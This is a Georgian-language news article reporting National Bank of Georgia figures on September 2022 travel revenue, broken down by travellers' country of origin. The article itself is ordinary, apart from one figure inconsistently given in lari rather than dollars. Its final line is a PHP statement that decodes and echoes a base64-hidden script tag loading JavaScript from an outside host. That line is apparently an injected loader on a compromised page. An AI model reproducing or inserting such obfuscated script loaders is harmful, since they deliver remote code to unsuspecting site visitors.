celsiusi
ავერსი საქკაბელი
2022 წლის სექტემბერში წინა წლის ანალოგიურ პერიოდთან შედარებით საქართველოს საერთაშორისო მოგზაურობიდან შემოსავალი 132.1%-ით გაეზარდა.
 
სებ-ის ვებ-გვერდზე გამოქვეყნებული სტატისტიკის მიხედვით, 2022 წლის სექტემბერში უცხოელი მოგზაურებისგან შემოსავალი 375.6 მლნ დოლარს შეადგენდა, მაშინ, როცა ერთი წლის წინ ეს მაჩვენებელი 161.9 მლნ ლარით განისაზღვრა.
 
რაც შეეხება დანახარჯებს ქვეყნების მიხედვით, ეროვნული ბანკის მონაცემებით, ყველაზე მეტი შემოსავალი ქვეყანამ რუსეთის მოქალაქეებისგან მიიღო - 95.5 მლნ დოლარი, მეორე ადგილზეა თურქეთი - 35.8 მლნ აშშ დოლარი; სამეულს ასრულებს უკრაინა - 31.5 მლნ აშშ დოლარი.
 
დანარჩენი ქვეყნების მოგზაურებისგან მიღებული შემოსავალი კი ასე გამოიყურება:
 
დანარჩენი ქვეყნებიდან შემოსული მოგზაურებიდან ქვეყანამ - 61.7 მლნ აშშ დოლარის შემოსავალი მიიღო;
 
ევროკავშირის წევრი ქვეყნები - 44.7 მლნ დოლარი;
ისრაელი - 31.5 მლნ დოლარი;
ბელარუსი - 21.7 მლნ აშშ დოლარი;
სომხეთი - 15.9 მლნ დოლარი;
ირანი - 15.2 მლნ დოლარი;
საუდის არაბეთი - 11.7 მლნ დოლარი;
აზერბაიჯანი - 10.3 მლნ დოლარი.
 
ცნობისთვის,  2022 წლის აგვისტოს სტატისტიკას, სებ-ის მონაცემებით, საქართველომ საერთაშორისო მოგზაურობიდან 522.9 მლნ დოლარის შემოსავალი მიიღო.
400
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");